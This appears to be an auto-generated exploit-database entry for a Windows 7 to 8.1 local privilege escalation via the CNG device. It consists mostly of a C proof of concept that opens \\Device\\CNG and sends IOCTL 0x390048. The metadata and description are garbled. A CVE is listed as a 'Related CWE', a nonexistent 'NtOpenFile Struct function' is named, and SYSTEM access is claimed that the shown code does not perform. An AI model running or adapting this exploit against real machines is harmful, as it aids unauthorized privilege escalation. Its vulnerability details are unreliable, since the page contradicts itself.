NtOpenFile Struct Local Privilege Escalation

vendor:

Windows 7

by:

NTarakanov

7.2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Windows 7

Affected Version From: Windows 7

Affected Version To: Windows 8.1

Patch Exists: YES

Related CWE: CVE-2015-0057

CPE: o:microsoft:windows_7::-:professional

Metasploit: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2015

NtOpenFile Struct Local Privilege Escalation

This exploit is a local privilege escalation vulnerability in the NtOpenFile Struct function in Windows. It allows an attacker to gain SYSTEM privileges by sending a malicious IOCTL to the CNG device. This vulnerability was discovered by NTarakanov and was assigned CVE-2015-0057.

Mitigation:

Microsoft released a patch for this vulnerability in May 2015.

Source

Exploit-DB raw data:

// Source: http://www.binvul.com/viewthread.php?tid=508
// Source: https://twitter.com/NTarakanov/status/598370525132423168


#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma  comment(lib, "ntdll.lib")



int main(int argc, CHAR* argv[]) {
        typedef NTSTATUS  (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
        NT_OPEN_FILE NtOpenFileStruct;

        PVOID Info;
        HMODULE hModule = LoadLibrary(("ntdll.dll"));
        NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
        if(NtOpenFileStruct == NULL) {
                exit(-1);
        }
        


        UNICODE_STRING filename;
        RtlInitUnicodeString(&filename, L"\\Device\\CNG");

        
        OBJECT_ATTRIBUTES obja;
        obja.Attributes        =        0x40;
        obja.ObjectName =   &filename;
        obja.Length                =        0x18;
        obja.RootDirectory        =        NULL;
        obja.SecurityDescriptor        =        NULL;
        obja.SecurityQualityOfService        =        NULL;
        
        IO_STATUS_BLOCK iostatusblock;
        HANDLE hCNG   = NULL;
        NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
        if(NT_SUCCESS(stat)) {
                printf("File successfully opened.\n");
        }
        else {
                printf("File could not be opened.\n");
                return -1;
        }
        DWORD dwBuffer = 0;
        DWORD dwCnt           = 0;
        BOOL  bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
        if (FALSE == bRet)
        {
                printf("[*]Send IOCTL fail!\n");
                printf("[*]Error Code:%d\n", GetLastError());
        }
        else
        {
                printf("[*]0x%08x\n", dwBuffer);        
        }
        CloseHandle(hCNG);
        getchar();
        return 0;
}